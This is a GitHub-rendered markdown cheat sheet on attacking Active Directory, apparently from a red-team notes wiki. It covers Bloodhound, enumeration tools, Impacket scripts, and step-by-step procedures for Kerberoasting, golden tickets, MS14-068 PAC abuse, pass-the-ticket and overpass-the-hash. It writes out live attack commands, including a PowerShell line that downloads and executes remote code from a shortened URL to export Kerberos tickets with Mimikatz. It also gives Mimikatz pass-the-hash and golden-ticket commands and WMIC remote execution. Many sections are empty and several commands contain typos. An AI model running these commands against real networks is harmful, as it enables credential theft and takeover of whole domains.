Skip to content

Latest commit

 

History

History
681 lines (529 loc) · 49.1 KB

active-directory.md

File metadata and controls

681 lines (529 loc) · 49.1 KB
description
Where can we go, once we are in?

Attacking Active Directory

AD Guides and Reference

Active Directory Basics and Collections

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview

Domain Controllers
Domain Groups

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups

Group Policy

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831791(v=ws.11)

AD Certificate Services

https://docs.microsoft.com/en-us/learn/modules/implement-manage-active-directory-certificate-services

Kerberos

https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview

Attacking AD
Queries and Commands for Active Directory

{% content-ref url="../../blue-defense/device-hardening/ad-security-checks.md" %} ad-security-checks.md {% endcontent-ref %}

Bloodhound

The Active Directory Mapping tool. Used by Red and Blue teamers to map out their Active Directory environment and look for the shortest path to compromise Domain Admin.

{% tabs %} {% tab title="Guides and Reference" %}

__

{% endtab %}

{% tab title="Bloodhound Basics" %}

Bloodhound Basics

  • Uses graph theory to reveal the hidden and unintended relationships in an AD environment.
  • Easily identity highly complex attack paths - can be used by defenders ad well.
  • Bloodhound works by running an ingestor that queries AD for users, groups and hosts. It will then connect to each system to enumerate logged in users sessions and permissions. ***WARNING: VERY LOUD*** There is a stealth option but its limited.
  • Two Verisons
  • Multiple connection Methods you might need to specify
    • Group - group membership info
    • LocalGroup - Collect local admin info
    • Session - session info
    • SessionLoop - Continuously collection session info until killed
    • Trust - enumerate domain trust data
    • ACL - collect ACL data
    • ComputerOnly - local admin and session data
    • GPOLocalGroup - collects local admin info via group policy objects
    • LoggedOn - Collects session info using privileged methods (needs admin)
    • ObjectProps - collects node property info for users and devices.
    • Default - collects Group membership, local admin,sessions, and domain trusts
  • Commands

{% tab title="Bloodhound Related Tools" %}

{% tab title="Cypher Queries" %}

AD Enumeration

https://attl4s.github.io/assets/pdf/Understanding_Active_Directory_Enumeration.pdf

{% tabs %} {% tab title="Tools" %}

  • ADExplorer by Sysinternals - An advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database, define favorite locations, view object properties and attributes without having to open dialog boxes, edit permissions, view an object's schema, and execute sophisticated searches that you can save and re-execute.
  • ADRecon - ADRecon is a tool which extracts and combines various artifacts (as highlighted below) out of an AD environment.
  • ACLight -A tool for advanced discovery of Privileged Accounts - including Shadow Admins.
  • TruffleSnout - Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration.
  • Snaffler - It gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them. {% endtab %}

{% tab title="SPN Scanning" %}

{% tab title="Data Mining" %}

{% tab title="User Hunting" %}

{% tab title="LAPS" %}

{% tab title="ADFS" %}

AD Exploitation

{% tabs %} {% tab title="Tools" %}

Credential Harvesting

Exploitation

{% tab title="Impacket Scripts" %} Impacket scripts

  • GetTGT.py: Given a password, hash or aesKey, this script will request a TGT and save it as ccache.
  • GetST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf another user.
  • GetPac.py: This script will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]'s S4USelf + User to User Kerberos Authentication.
  • GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat.
  • GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
  • ticketConverter.py: This script will convert kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa.
  • ticketer.py: This script will create Golden/Silver tickets from scratch or based on a template (legally requested from the KDC) allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the groups, ExtraSids, duration, etc.
  • raiseChild.py: This script implements a child-domain to forest privilege escalation {% endtab %}

{% tab title="Kerberoasting" %}

Kerberoasting

  • Any ticket can be requested by any user with kerberos, from the domain controller
  • Those tickets are encrypted with the NTLM hash of the associated service user.
  • If we can guess the password to teh associated service user's NTLM hash, then we now know the password to the actual service account
  • Steps:
    • List all SPN services. These are the service accounts for which we are going to pull all the kerberos tickets
      • >setspn -T [domain] -F -Q */*
    • Next we target either a single user SPN or pull all the user Kerberos tickets into our user's memory
      • Single target
        • >powershell Add-Tpe -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArguementList “HTTP/[hostname].[domain].local”
      • All User tickets
      • And the powersploit tool to automate this!
      • Now we have our tickets imported into memory and we need to extract them.
        • Mimikatz Kerberoast export:
        • >powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2qx4kuH'); Invoke-Mimikatz -Command ‘’'''''kerberos::list /export'''''''
        • Once extracted and on our victims machine and we can start cracking them!
          • use tgsrepcrack.p {% endtab %}

{% tab title="Golden Ticket" %} AD-001 - Golden Ticket

  • Creating your own tickets to Auth to any server
  • You can take the old krbtgt hash from the previous hash dump and promote yourself back to Domain admin, all with an unprivileged account
  • A few notes on krbtgt:
    • Do not reset the system generated password, it could break the whole domain
    • Even if you change every password for every domain admin, you can still become a DA
    • You can create Users and Groups that do not exist within the Golden ticket
  • What you need
    • Domain - on victim host type: whoami
    • Domain Admin user - On victim host type: net local group administrators /DOMAIN
    • Domain SID - whoami /user chop off the last dash and 4 digits
    • krbtgt - From previous hashdump, use the second half of the hash/the NTLM hash
  • Process
    • Run Smbexec, choose hashdump, and dump the domain controller
    • A log file will be created with the domain hashes. The one we need is the second part of the krbtgt hash
    • Return to original shell
    • Drop into mimikatz 2.0
      • use kiwi
    • Create golden ticket
      • >golden_ticket_create -u [domain admin suername] -d [domain] -k [krbtgt hash] -s [Domain SID] -t [location to Drop Golden Ticket]
  • Using the Golden ticket
    • Shell access with limited access
      • >session -i
    • Load mimikatz
      • >use kiwi
    • Check current Kerberos Tickets
      • > kerberos_ticket_list
    • Purge all Kerberos Tickets
      • >kerberos_ticket_purge
    • Local our Golden Ticket (stored in /opt/ticekt.txt in our vm)
      • >kerberos_ticket_use /opt/ticket.txt
    • Drop into a shell and read files off the DC
      • >shell
      • > dir \ \DC\c$
    • Once we are authed using the Golden ticket, we can send Domain admin commands using WMIC
    • Example: execute a ping commmand and write that to a file on a remote server
      • wmic /authority:"Kerberos:[attacker.domain] \[target hostname]" /node:[target hostname] process call create "cmd /c ping 127.0.0.1 > C:\log.txt {% endtab %} {% endtabs %}

{% tabs %} {% tab title="Privildge Attribute Cert Vuln" %} Privilege Attribute Certificate vulnerability

  • With basic information on a domain user you can move to a domain admin by editing the PAC
    • #git clone https://github.com/bidord/pykek /opt/pykek
    • # apt-get install krb5-user
    • # apt-get install rdate
    • # rdate -n [domain]
    • # echo [attacker IP][domain controller hostname] >> /etc/host
  • Next we need 4 pieces of information
    • -u username@domain (user@domain1)
    • -d domain controller [domain.controller.test]
    • -p password
    • -s SID (get SID with command “whoami /user”
  • Now that we have all the pieces
    • #cd /opt/pykek
    • #python ms12-068.py -d domain.controller.test -u user@domain1 -s [SID] -p [password
  • We have created a credential cache ticket and now we copy it where it needs to go
  • Now you have access with
    • #smclient -k -W domain1 //domain.controller.test/c$ -k {% endtab %}

{% tab title="Pass-The-Ticket" %} https://0xeb-bp.github.io/blog/2019/11/21/practical-guide-pass-the-ticket.html

Kerberos Pass-The-Ticket

  • Start with writing all tickets to the folder from wihch it was executed.
    • >privilege :: debug
    • >sekurlsa::tickets /export
  • Now we import one of those as our tikets and drop back into mimikatz
    • >kerberos::ptt [0,ab9bf] [ticket info] {% endtab %}

{% tab title="OverPTH" %} Overpass the Hash

  • Over abuse NTLM user hash to gain a full Kerberos TGT
  • The essence of the overpass the hash technique is to turn the NTLM hash into a Kerberos ticketand avoid the use of NTLM authentication. A simple way to do this is again with the sekurlsa::pth command from Mimikatz.
  • #mimikatz # sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe {% endtab %}

{% tab title="Kerberos Relay" %}

Abusing Delegation

Abusing Constrained Delegation
Abusing Unconstrained Delegation

Attacking Domain Trusts

Attacking Domain Trusts

Privileges and Permissions

Privileges and Permissions
  • zBang - zBang is a risk assessment tool that detects potential privileged account threats

Insecure Usage of High Privilege Accounts

Local Admin Privileges

Writeable Executables in Shares

DNSAdmins

RID

Misconfigurations

{% tabs %} {% tab title="GPO" %}

{% tab title="MSSQL Access" %}

{% tab title="Forest/Domain Trust" %}

{% tab title="ACLs" %}

{% tab title="LAPS" %}

{% tab title="RODC" %}

DCShadow

DCShadow

Specific Vulnerabilities

Specific Vulnerabilities

Remote Potato

PetitPotam

Bronze Bit

Zerologon

Skeleton Key

MS14-068 Kerberos Vulnerability

Special AD Target

Unsupported OS

Microsoft SQL Server

Red Forest

Exchange